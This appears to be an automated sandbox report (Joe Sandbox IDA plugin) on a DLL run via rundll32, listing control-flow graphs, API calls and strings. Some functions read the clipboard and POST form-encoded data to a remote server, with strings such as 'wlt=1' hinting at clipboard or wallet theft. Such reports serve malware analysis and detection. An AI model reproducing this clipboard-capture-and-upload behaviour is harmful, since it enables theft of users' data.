9644->9643 9645->9619 9647 6e4ee33b 9646->9647 9648 6e4ee393 9646->9648 9649 6e4ee34b 9647->9649 9650 6e4eb90f _free 14 API calls 9647->9650 9648->9597 9651 6e4ee35d 9649->9651 9652 6e4eb90f _free 14 API calls 9649->9652 9650->9649 9653 6e4ee36f 9651->9653 9654 6e4eb90f _free 14 API calls 9651->9654 9652->9651 9655 6e4ee381 9653->9655 9656 6e4eb90f _free 14 API calls 9653->9656 9654->9653 9655->9648 9657 6e4eb90f _free 14 API calls 9655->9657 9656->9655 9657->9648 9659 6e4edf6e 9658->9659 9660 6e4edf8d 9658->9660 9659->9660 9664 6e4ee3cf 9659->9664 9660->9614 9663 6e4eb90f _free 14 API calls 9663->9660 9665 6e4edf87 9664->9665 9666 6e4ee3e0 9664->9666 9665->9663 9667 6e4ee397 __fassign 14 API calls 9666->9667 9668 6e4ee3e8 9667->9668 9669 6e4ee397 __fassign 14 API calls 9668->9669 9670 6e4ee3f3 9669->9670 9671 6e4ee397 __fassign 14 API calls 9670->9671 9672 6e4ee3fe 9671->9672 9673 6e4ee397 __fassign 14 API calls 9672->9673 9674 6e4ee409 9673->9674 9675 6e4ee397 __fassign 14 API calls 9674->9675 9676 6e4ee417 9675->9676 9677 6e4eb90f _free 14 API calls 9676->9677 9678 6e4ee422 9677->9678 9679 6e4eb90f _free 14 API calls 9678->9679 9680 6e4ee42d 9679->9680 9681 6e4eb90f _free 14 API calls 9680->9681 9682 6e4ee438 9681->9682 9683 6e4ee397 __fassign 14 API calls 9682->9683 9684 6e4ee446 9683->9684 9685 6e4ee397 __fassign 14 API calls 9684->9685 9686 6e4ee454 9685->9686 9687 6e4ee397 __fassign 14 API calls 9686->9687 9688 6e4ee465 9687->9688 9689 6e4ee397 __fassign 14 API calls 9688->9689 9690 6e4ee473 9689->9690 9691 6e4ee397 __fassign 14 API calls 9690->9691 9692 6e4ee481 9691->9692 9693 6e4eb90f _free 14 API calls 9692->9693 9694 6e4ee48c 9693->9694 9695 6e4eb90f _free 14 API calls 9694->9695 9696 6e4ee497 9695->9696 9697 6e4eb90f _free 14 API calls 9696->9697 9698 6e4ee4a2 9697->9698 9699 6e4eb90f _free 14 API calls 9698->9699 9699->9665 9700->9589 9702 6e4e68d8 9701->9702 9703 6e4e7f52 9701->9703 9702->9335 9704 6e4e7f60 9703->9704 9709 6e4e9150 9703->9709 9706 6e4e918b ___vcrt_FlsSetValue 6 API calls 9704->9706 9707 6e4e7f70 9706->9707 9714 6e4e7f29 9707->9714 9710 6e4e9091 ___vcrt_InitializeCriticalSectionEx 5 API calls 9709->9710 9711 6e4e916a 9710->9711 9712 6e4e9176 9711->9712 9713 6e4e9182 TlsGetValue 9711->9713 9712->9704 9713->9712 9715 6e4e7f33 9714->9715 9716 6e4e7f40 9714->9716 9715->9716 9717 6e4eada7 ___std_exception_destroy 14 API calls 9715->9717 9716->9702 9717->9716 9724 6e4e7f89 9718->9724 9720 6e4e68b4 9720->9360 9721 6e4eacdf 9720->9721 9722 6e4eb423 __dosmaperr 14 API calls 9721->9722 9723 6e4e68c0 9722->9723 9723->9363 9723->9364 9725 6e4e7f95 GetLastError 9724->9725 9726 6e4e7f92 9724->9726 9727 6e4e9150 ___vcrt_FlsGetValue 6 API calls 9725->9727 9726->9720 9728 6e4e7faa 9727->9728 9729 6e4e800f SetLastError 9728->9729 9730 6e4e918b ___vcrt_FlsSetValue 6 API calls 9728->9730 9737 6e4e7fc9 9728->9737 9729->9720 9731 6e4e7fc3 __CreateFrameInfo 9730->9731 9732 6e4e918b ___vcrt_FlsSetValue 6 API calls 9731->9732 9734 6e4e7feb 9731->9734 9731->9737 9732->9734 9733 6e4e918b ___vcrt_FlsSetValue 6 API calls 9735 6e4e7fff 9733->9735 9734->9733 9734->9735 9736 6e4eada7 ___std_exception_destroy 14 API calls 9735->9736 9736->9737 9737->9729

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 0 6e4e1ec0-6e4e1f1c call 6e4e6751 4 6e4e242e-6e4e2459 call 6e4e5d90 0->4 5 6e4e1f22-6e4e1f26 0->5 10 6e4e245b-6e4e2467 4->10 11 6e4e2483-6e4e249b 4->11 5->4 7 6e4e1f2c-6e4e1f30 5->7 7->4 9 6e4e1f36-6e4e2053 call 6e4e5d90 InternetOpenW InternetConnectA HttpOpenRequestA HttpSendRequestA InternetReadFile 7->9 24 6e4e225f-6e4e22c8 InternetCloseHandle * 3 9->24 25 6e4e2059 9->25 13 6e4e2479-6e4e2480 call 6e4e679f 10->13 14 6e4e2469-6e4e2477 10->14 16 6e4e23e5-6e4e23fd 11->16 17 6e4e24a1-6e4e24ad 11->17 13->11 14->13 22 6e4e24ef call 6e4e99dc 14->22 20 6e4e24d2-6e4e24ee call 6e4e6791 16->20 21 6e4e2403-6e4e240f 16->21 18 6e4e23db-6e4e23e2 call 6e4e679f 17->18 19 6e4e24b3-6e4e24c1 17->19 18->16 19->22 27 6e4e24c3 19->27 28 6e4e24c8-6e4e24cf call 6e4e679f 21->28 29 6e4e2415-6e4e2423 21->29 42 6e4e24f4-6e4e24f9 call 6e4e6c3c 22->42 32 6e4e22ff-6e4e231d 24->32 33 6e4e22ca-6e4e22d9 24->33 35 6e4e2060-6e4e2067 25->35 27->18 28->20 29->22 40 6e4e2429 29->40 37 6e4e231f-6e4e2330 32->37 38 6e4e2350-6e4e2371 32->38 43 6e4e22ef-6e4e22fc call 6e4e679f 33->43 44 6e4e22db-6e4e22e9 33->44 45 6e4e206d-6e4e209b 35->45 46 6e4e2259 35->46 47 6e4e2346-6e4e234d call 6e4e679f 37->47 48 6e4e2332-6e4e2340 37->48 50 6e4e239f-6e4e23b7 38->50 51 6e4e2373-6e4e237f 38->51 40->28 43->32 44->22 44->43 54 6e4e20a0-6e4e20a5 45->54 46->24 47->38 48->22 48->47 50->16 60 6e4e23b9-6e4e23c5 50->60 57 6e4e2395-6e4e239c call 6e4e679f 51->57 58 6e4e2381-6e4e238f 51->58 54->54 55 6e4e20a7-6e4e214b call 6e4e5d90 * 2 54->55 70 6e4e214d-6e4e217f call 6e4e9260 55->70 71 6e4e2181-6e4e219a call 6e4e6390 55->71 57->50 58->22 58->57 60->18 65 6e4e23c7-6e4e23d5 60->65 65->18 65->22 76 6e4e21a0-6e4e21ad 70->76 71->76 77 6e4e21af-6e4e21ba 76->77 78 6e4e21da-6e4e21e7 76->78 81 6e4e21bc-6e4e21ca 77->81 82 6e4e21d0-6e4e21d7 call 6e4e679f 77->82 79 6e4e2218-6e4e2223 78->79 80 6e4e21e9-6e4e21f8 78->80 79->42 85 6e4e2229-6e4e2253 InternetReadFile 79->85 83 6e4e220e-6e4e2215 call 6e4e679f 80->83 84 6e4e21fa-6e4e2208 80->84 81->22 81->82 82->78 83->79 84->22 84->83 85->35 85->46
          APIs
          • std::_Xinvalid_argument.LIBCPMT ref: 6E4E1EC5
            • Part of subcall function 6E4E6751: std::invalid_argument::invalid_argument.LIBCONCRT ref: 6E4E675D
          • InternetOpenW.WININET(6E4FBA54,00000000,00000000,00000000,00000000), ref: 6E4E1FA7
          • InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 6E4E1FCE
          • HttpOpenRequestA.WININET(00000000,POST,?,00000000,00000000,00000000,00000000,00000001), ref: 6E4E1FF8
          • HttpSendRequestA.WININET(00000000,00000000,00000000,?,00000000), ref: 6E4E2031
          • InternetReadFile.WININET(00000000,?,000003FF,?), ref: 6E4E204B
          • InternetReadFile.WININET(?,00000000,000003FF,00000000), ref: 6E4E224B
          • InternetCloseHandle.WININET(00000000), ref: 6E4E2266
          • InternetCloseHandle.WININET(?), ref: 6E4E226E
          • InternetCloseHandle.WININET(?), ref: 6E4E2276
          Strings
          Memory Dump Source
          • Source File: 00000007.00000002.3795562918.000000006E4E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E4E0000, based on PE: true
          • Associated: 00000007.00000002.3795542724.000000006E4E0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000007.00000002.3795590686.000000006E4F6000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000007.00000002.3795611871.000000006E4FE000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000007.00000002.3795633341.000000006E500000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_7_2_6e4e0000_rundll32.jbxd
          Similarity
          • API ID: Internet$CloseHandle$FileHttpOpenReadRequest$ConnectSendXinvalid_argumentstd::_std::invalid_argument::invalid_argument
          • String ID: Content-Type: application/x-www-form-urlencoded$POST$string too long
          • API String ID: 4066372336-370044323
          • Opcode ID: 1d4d3cb32b1b3bc3fd286e043ecdcff902d11a08a1a9113a72b6227daddfbd89
          • Instruction ID: 33e7eaf1747e4092f778ee27b1a7e2e1fff1be3df3b64dc206175034126d5a01
          • Opcode Fuzzy Hash: 1d4d3cb32b1b3bc3fd286e043ecdcff902d11a08a1a9113a72b6227daddfbd89
          • Instruction Fuzzy Hash: 8FF1E1B09102199BEB24CF78CC84BDDBBB5AF44305F5041DDE609AB681CB75AAC4CF99

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 207 6e4e31b0-6e4e33a6 211 6e4e33db-6e4e33f7 call 6e4e6791 207->211 212 6e4e33a8-6e4e33b4 207->212 213 6e4e33b6-6e4e33c4 212->213 214 6e4e33d1-6e4e33d8 call 6e4e679f 212->214 213->214 216 6e4e33f8-6e4e34f3 call 6e4e99dc call 6e4e5ed0 call 6e4e5d90 213->216 214->211 227 6e4e351d-6e4e3530 216->227 228 6e4e34f5-6e4e3501 216->228 229 6e4e3513-6e4e351a call 6e4e679f 228->229 230 6e4e3503-6e4e3511 228->230 229->227 230->229 231 6e4e3531-6e4e36d1 call 6e4e99dc call 6e4e5d90 230->231 241 6e4e3734-6e4e3750 call 6e4e6791 231->241 242 6e4e36d3-6e4e36df 231->242 243 6e4e372a-6e4e3731 call 6e4e679f 242->243 244 6e4e36e1-6e4e36ef 242->244 243->241 244->243 246 6e4e3751-6e4e3823 call 6e4e99dc call 6e4e5ed0 call 6e4e6060 244->246 257 6e4e384d-6e4e385e 246->257 258 6e4e3825-6e4e3831 246->258 259 6e4e3843-6e4e384a call 6e4e679f 258->259 260 6e4e3833-6e4e3841 258->260 259->257 260->259 261 6e4e385f-6e4e38d5 call 6e4e99dc OpenClipboard 260->261 266 6e4e38db-6e4e38ea GetClipboardData 261->266 267 6e4e3a87-6e4e3a99 261->267 268 6e4e38f0-6e4e38fc GlobalLock 266->268 269 6e4e3a81 CloseClipboard 266->269 270 6e4e3a7a-6e4e3a7b GlobalUnlock 268->270 271 6e4e3902-6e4e3921 WideCharToMultiByte 268->271 269->267 270->269 271->270 272 6e4e3927-6e4e3a50 call 6e4e6230 WideCharToMultiByte call 6e4e5d90 271->272 272->270 282 6e4e3a52-6e4e3a5e 272->282 283 6e4e3a70-6e4e3a77 call 6e4e679f 282->283 284 6e4e3a60-6e4e3a6e 282->284 283->270 284->283 285 6e4e3a9a-6e4e3b6d call 6e4e99dc call 6e4e5d90 call 6e4e5b80 * 2 call 6e4e1ed0 call 6e4e5b80 call 6e4e5d90 call 6e4e31b0 284->285
          Strings
          Memory Dump Source
          • Source File: 00000007.00000002.3795562918.000000006E4E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E4E0000, based on PE: true
          • Associated: 00000007.00000002.3795542724.000000006E4E0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000007.00000002.3795590686.000000006E4F6000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000007.00000002.3795611871.000000006E4FE000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000007.00000002.3795633341.000000006E500000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_7_2_6e4e0000_rundll32.jbxd
          Similarity
          • API ID:
          • String ID: +++$abcdefghijklmnopqrstuvwxyz0123456789$wlt=1
          • API String ID: 0-2251221455
          • Opcode ID: 74bf3d4899feab3f8002337393638984585930bcfbc09530bea3e3af395c9fe2
          • Instruction ID: bd5effbbe16d20891d9d9489fbf8d78174e9afad6dbce0828d0806f9a3b3efa6
          • Opcode Fuzzy Hash: 74bf3d4899feab3f8002337393638984585930bcfbc09530bea3e3af395c9fe2
          • Instruction Fuzzy Hash: 8AF10371A00249AFEB04CFB8D848F9EBBB9EB45715F10465EE811ABBC0DB759940CBD1

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 90 6e4e1ed0-6e4e1f1c 91 6e4e242e-6e4e2459 call 6e4e5d90 90->91 92 6e4e1f22-6e4e1f26 90->92 97 6e4e245b-6e4e2467 91->97 98 6e4e2483-6e4e249b 91->98 92->91 94 6e4e1f2c-6e4e1f30 92->94 94->91 96 6e4e1f36-6e4e2053 call 6e4e5d90 InternetOpenW InternetConnectA HttpOpenRequestA HttpSendRequestA InternetReadFile 94->96 111 6e4e225f-6e4e22c8 InternetCloseHandle * 3 96->111 112 6e4e2059 96->112 100 6e4e2479-6e4e2480 call 6e4e679f 97->100 101 6e4e2469-6e4e2477 97->101 103 6e4e23e5-6e4e23fd 98->103 104 6e4e24a1-6e4e24ad 98->104 100->98 101->100 109 6e4e24ef call 6e4e99dc 101->109 107 6e4e24d2-6e4e24ee call 6e4e6791 103->107 108 6e4e2403-6e4e240f 103->108 105 6e4e23db-6e4e23e2 call 6e4e679f 104->105 106 6e4e24b3-6e4e24c1 104->106 105->103 106->109 114 6e4e24c3 106->114 115 6e4e24c8-6e4e24cf call 6e4e679f 108->115 116 6e4e2415-6e4e2423 108->116 129 6e4e24f4-6e4e24f9 call 6e4e6c3c 109->129 119 6e4e22ff-6e4e231d 111->119 120 6e4e22ca-6e4e22d9 111->120 122 6e4e2060-6e4e2067 112->122 114->105 115->107 116->109 127 6e4e2429 116->127 124 6e4e231f-6e4e2330 119->124 125 6e4e2350-6e4e2371 119->125 130 6e4e22ef-6e4e22fc call 6e4e679f 120->130 131 6e4e22db-6e4e22e9 120->131 132 6e4e206d-6e4e209b 122->132 133 6e4e2259 122->133 134 6e4e2346-6e4e234d call 6e4e679f 124->134 135 6e4e2332-6e4e2340 124->135 137 6e4e239f-6e4e23b7 125->137 138 6e4e2373-6e4e237f 125->138 127->115 130->119 131->109 131->130 141 6e4e20a0-6e4e20a5 132->141 133->111 134->125 135->109 135->134 137->103 147 6e4e23b9-6e4e23c5 137->147 144 6e4e2395-6e4e239c call 6e4e679f 138->144 145 6e4e2381-6e4e238f 138->145 141->141 142 6e4e20a7-6e4e214b call 6e4e5d90 * 2 141->142 157 6e4e214d-6e4e217f call 6e4e9260 142->157 158 6e4e2181-6e4e219a call 6e4e6390 142->158 144->137 145->109 145->144 147->105 152 6e4e23c7-6e4e23d5 147->152 152->105 152->109 163 6e4e21a0-6e4e21ad 157->163 158->163 164 6e4e21af-6e4e21ba 163->164 165 6e4e21da-6e4e21e7 163->165 168 6e4e21bc-6e4e21ca 164->168 169 6e4e21d0-6e4e21d7 call 6e4e679f 164->169 166 6e4e2218-6e4e2223 165->166 167 6e4e21e9-6e4e21f8 165->167 166->129 172 6e4e2229-6e4e2253 InternetReadFile 166->172 170 6e4e220e-6e4e2215 call 6e4e679f 167->170 171 6e4e21fa-6e4e2208 167->171 168->109 168->169 169->165 170->166 171->109 171->170 172->122 172->133
          APIs
          • InternetOpenW.WININET(6E4FBA54,00000000,00000000,00000000,00000000), ref: 6E4E1FA7
          • InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 6E4E1FCE
          • HttpOpenRequestA.WININET(00000000,POST,?,00000000,00000000,00000000,00000000,00000001), ref: 6E4E1FF8
          • HttpSendRequestA.WININET(00000000,00000000,00000000,?,00000000), ref: 6E4E2031
          • InternetReadFile.WININET(00000000,?,000003FF,?), ref: 6E4E204B
          • InternetReadFile.WININET(?,00000000,000003FF,00000000), ref: 6E4E224B
          • InternetCloseHandle.WININET(00000000), ref: 6E4E2266
          • InternetCloseHandle.WININET(?), ref: 6E4E226E
          • InternetCloseHandle.WININET(?), ref: 6E4E2276
          Strings
          • Content-Type: application/x-www-form-urlencoded, xrefs: 6E4E1F71
          • POST, xrefs: 6E4E1FF2
          Memory Dump Source
          • Source File: 00000007.00000002.3795562918.000000006E4E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E4E0000, based on PE: true
          • Associated: 00000007.00000002.3795542724.000000006E4E0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000007.00000002.3795590686.000000006E4F6000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000007.00000002.3795611871.000000006E4FE000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000007.00000002.3795633341.000000006E500000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_7_2_6e4e0000_rundll32.jbxd
          Similarity
          • API ID: Internet$CloseHandle$FileHttpOpenReadRequest$ConnectSend
          • String ID: Content-Type: application/x-www-form-urlencoded$POST
          • API String ID: 1354133546-2387545335
          • Opcode ID: 8351155834e921456ee1a4a91846747d54c0cbd06ab813484591faed9a1ea621
          • Instruction ID: 27fa45f60111f9d2e93adf95bf5f6daf74d35af07e739c8c54b651f547368c4f
          • Opcode Fuzzy Hash: 8351155834e921456ee1a4a91846747d54c0cbd06ab813484591faed9a1ea621
          • Instruction Fuzzy Hash: 55F1E1B0A00219DBEB24CF78CC84B9DBBB5AF45305F5041DDE609AB681CB759AC4CF99

          Control-flow Graph

          APIs
          • __RTC_Initialize.LIBCMT ref: 6E4E6EC1
          • ___scrt_uninitialize_crt.LIBCMT ref: 6E4E6EDB
          Memory Dump Source
          • Source File: 00000007.00000002.3795562918.000000006E4E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E4E0000, based on PE: true
          • Associated: 00000007.00000002.3795542724.000000006E4E0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000007.00000002.3795590686.000000006E4F6000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000007.00000002.3795611871.000000006E4FE000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000007.00000002.3795633341.000000006E500000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_7_2_6e4e0000_rundll32.jbxd
          Similarity
          • API ID: Initialize___scrt_uninitialize_crt
          • String ID:
          • API String ID: 2442719207-0
          • Opcode ID: fb9c222ec58e339fbd4dc08d420a694e0584301c73b4ce23a88d18859c468e5c
          • Instruction ID: b98a786a0791608f36aa8634a9c752848a1e5ec78973120c35ac5fa7e56b6617
          • Opcode Fuzzy Hash: fb9c222ec58e339fbd4dc08d420a694e0584301c73b4ce23a88d18859c468e5c
          • Instruction Fuzzy Hash: 2D41F772D14219AFDB218FF9D844FAE3AB9EF80BA6F10495BE91467A81C7304D01CBD0

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 353 6e4e6f2c-6e4e6f3d call 6e4e73b0 356 6e4e6f4e-6e4e6f55 353->356 357 6e4e6f3f-6e4e6f45 353->357 358 6e4e6f57-6e4e6f5a 356->358 359 6e4e6f61-6e4e6f75 dllmain_raw 356->359 357->356 360 6e4e6f47-6e4e6f49 357->360 358->359 361 6e4e6f5c-6e4e6f5f 358->361 362 6e4e701e-6e4e7025 359->362 363 6e4e6f7b-6e4e6f8c dllmain_crt_dispatch 359->363 364 6e4e7027-6e4e7036 360->364 365 6e4e6f92-6e4e6fa4 call 6e4e6640 361->365 362->364 363->362 363->365 368 6e4e6fcd-6e4e6fcf 365->368 369 6e4e6fa6-6e4e6fa8 365->369 371 6e4e6fd6-6e4e6fe7 dllmain_crt_dispatch 368->371 372 6e4e6fd1-6e4e6fd4 368->372 369->368 370 6e4e6faa-6e4e6fc8 call 6e4e6640 call 6e4e6e7a dllmain_raw 369->370 370->368 371->362 373 6e4e6fe9-6e4e701b dllmain_raw 371->373 372->362 372->371 373->362
          APIs
          Memory Dump Source
          • Source File: 00000007.00000002.3795562918.000000006E4E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E4E0000, based on PE: true
          • Associated: 00000007.00000002.3795542724.000000006E4E0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000007.00000002.3795590686.000000006E4F6000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000007.00000002.3795611871.000000006E4FE000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000007.00000002.3795633341.000000006E500000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_7_2_6e4e0000_rundll32.jbxd
          Similarity
          • API ID: dllmain_raw$dllmain_crt_dispatch
          • String ID:
          • API String ID: 3136044242-0
          • Opcode ID: b719308f7c797cf5df96f8accdefec5ffce649bbe6ef68f820b3d764cace6b53
          • Instruction ID: 91c0c76e242868ca85f7198d78f53c1723a5b3bd26f2b41a21317119bc4f3e90
          • Opcode Fuzzy Hash: b719308f7c797cf5df96f8accdefec5ffce649bbe6ef68f820b3d764cace6b53
          • Instruction Fuzzy Hash: 5D21B471D14129AFDB618FF5C844EAF3A69EB84BA6F01455BFD1467A51C3308D019BD0

          Control-flow Graph

          APIs
          • GetLastError.KERNEL32(?,?,00000001,6E4EB68B,6E4EB935,?,?,6E4EAB0E), ref: 6E4EB428
          • _free.LIBCMT ref: 6E4EB485
          • _free.LIBCMT ref: 6E4EB4BB
          • SetLastError.KERNEL32(00000000,00000006,000000FF,?,00000001,6E4EB68B,6E4EB935,?,?,6E4EAB0E), ref: 6E4EB4C6
          Memory Dump Source
          • Source File: 00000007.00000002.3795562918.000000006E4E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E4E0000, based on PE: true
          • Associated: 00000007.00000002.3795542724.000000006E4E0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000007.00000002.3795590686.000000006E4F6000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000007.00000002.3795611871.000000006E4FE000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000007.00000002.3795633341.000000006E500000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_7_2_6e4e0000_rundll32.jbxd
          Similarity
          • API ID: ErrorLast_free
          • String ID:
          • API String ID: 2283115069-0
          • Opcode ID: e64e23a050ae7e122fa720e52baecf6495d8812312f3cc12a44597a66dad4171
          • Instruction ID: 0474ba34646a46ba55e3b97f6fac714d1cfac75cd9a61a3ca4236cff8e244800
          • Opcode Fuzzy Hash: e64e23a050ae7e122fa720e52baecf6495d8812312f3cc12a44597a66dad4171
          • Instruction Fuzzy Hash: C0114C31600B006ED6616AFA7CC0F6B255E9BC2B7FB280E2BF52893AC9DF218C114595

          Control-flow Graph

          APIs
          • __RTC_Initialize.LIBCMT ref: 6E4E6DC0
            • Part of subcall function 6E4E7490: InitializeSListHead.KERNEL32(6E4FF718,6E4E6DCA,6E4FC7B0,00000010,6E4E6D5B,?,?,?,6E4E6F85,?,00000001,?,?,00000001,?,6E4FC7F8), ref: 6E4E7495
          • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6E4E6E2A
          Memory Dump Source
          • Source File: 00000007.00000002.3795562918.000000006E4E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E4E0000, based on PE: true
          • Associated: 00000007.00000002.3795542724.000000006E4E0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000007.00000002.3795590686.000000006E4F6000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000007.00000002.3795611871.000000006E4FE000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000007.00000002.3795633341.000000006E500000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_7_2_6e4e0000_rundll32.jbxd
          Similarity
          • API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image
          • String ID:
          • API String ID: 3231365870-0
          • Opcode ID: ee0da3876790ffed2b947f0a8990f31418eedab631ece946a81d606434dedcf4
          • Instruction ID: a9eac9af6a67636474e0e6fd6e1bfc30452e34586741e1208f2839a8fd9151bc
          • Opcode Fuzzy Hash: ee0da3876790ffed2b947f0a8990f31418eedab631ece946a81d606434dedcf4
          • Instruction Fuzzy Hash: 6E21D1329692459ADB416BF8E414FDC37A5AF0262FF1148DFDA816BAC2CF215401C6E5

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 455 6e4eeeae-6e4eeebb call 6e4eb8b2 457 6e4eeec0-6e4eeecb 455->457 458 6e4eeecd-6e4eeecf 457->458 459 6e4eeed1-6e4eeed9 457->459 460 6e4eef1c-6e4eef28 call 6e4eb90f 458->460 459->460 461 6e4eeedb-6e4eeedf 459->461 462 6e4eeee1-6e4eef16 call 6e4ed0de 461->462 467 6e4eef18-6e4eef1b 462->467 467->460
          APIs
            • Part of subcall function 6E4EB8B2: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,6E4EB46E,00000001,00000364,00000006,000000FF,?,00000001,6E4EB68B,6E4EB935,?,?,6E4EAB0E), ref: 6E4EB8F3
          • _free.LIBCMT ref: 6E4EEF1D
          Memory Dump Source
          • Source File: 00000007.00000002.3795562918.000000006E4E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E4E0000, based on PE: true
          • Associated: 00000007.00000002.3795542724.000000006E4E0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000007.00000002.3795590686.000000006E4F6000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000007.00000002.3795611871.000000006E4FE000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000007.00000002.3795633341.000000006E500000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_7_2_6e4e0000_rundll32.jbxd
          Similarity
          • API ID: AllocateHeap_free
          • String ID:
          • API String ID: 614378929-0
          • Opcode ID: 5f52aec67efb57151ddd9cf007e78782c2d025e2ddda8bab545638a33767c9fe
          • Instruction ID: d704c7563dd7a703af59afe3fb9d902205e9d78046f1b866a05286187840f459
          • Opcode Fuzzy Hash: 5f52aec67efb57151ddd9cf007e78782c2d025e2ddda8bab545638a33767c9fe
          • Instruction Fuzzy Hash: CF01D6726043166BD3258FB8C881DCAFBA8FB053B1F15066EE555A7AC0D370A811CBE0

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 468 6e4eb8b2-6e4eb8bd 469 6e4eb8bf-6e4eb8c9 468->469 470 6e4eb8cb-6e4eb8d1 468->470 469->470 471 6e4eb8ff-6e4eb90a call 6e4eb686 469->471 472 6e4eb8ea-6e4eb8fb RtlAllocateHeap 470->472 473 6e4eb8d3-6e4eb8d4 470->473 478 6e4eb90c-6e4eb90e 471->478 474 6e4eb8fd 472->474 475 6e4eb8d6-6e4eb8dd call 6e4ee4b3 472->475 473->472 474->478 475->471 481 6e4eb8df-6e4eb8e8 call 6e4e9eaa 475->481 481->471 481->472
          APIs
          • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,6E4EB46E,00000001,00000364,00000006,000000FF,?,00000001,6E4EB68B,6E4EB935,?,?,6E4EAB0E), ref: 6E4EB8F3
          Memory Dump Source
          • Source File: 00000007.00000002.3795562918.000000006E4E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E4E0000, based on PE: true
          • Associated: 00000007.00000002.3795542724.000000006E4E0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000007.00000002.3795590686.000000006E4F6000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000007.00000002.3795611871.000000006E4FE000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000007.00000002.3795633341.000000006E500000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_7_2_6e4e0000_rundll32.jbxd
          Similarity
          • API ID: AllocateHeap
          • String ID:
          • API String ID: 1279760036-0
          • Opcode ID: d761fdfaf39af804b0ab7891687bb7963dd51273fa0c6f0f528f22f7be3e7cf2
          • Instruction ID: 7b8baff524b4288bf5647e475499b4c0e9a1869e98644602da00c42ee4d57906
          • Opcode Fuzzy Hash: d761fdfaf39af804b0ab7891687bb7963dd51273fa0c6f0f528f22f7be3e7cf2
          • Instruction Fuzzy Hash: 7EF0BB31915B2957EB715EF79C14E47375CBF82A62B114063D85496BCCCB70D80186D1
          APIs
          • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 6E4E7294
          • IsDebuggerPresent.KERNEL32 ref: 6E4E7360
          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6E4E7380
          • UnhandledExceptionFilter.KERNEL32(?), ref: 6E4E738A
          Memory Dump Source
          • Source File: 00000007.00000002.3795562918.000000006E4E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E4E0000, based on PE: true
          • Associated: 00000007.00000002.3795542724.000000006E4E0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000007.00000002.3795590686.000000006E4F6000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000007.00000002.3795611871.000000006E4FE000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000007.00000002.3795633341.000000006E500000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_7_2_6e4e0000_rundll32.jbxd
          Similarity
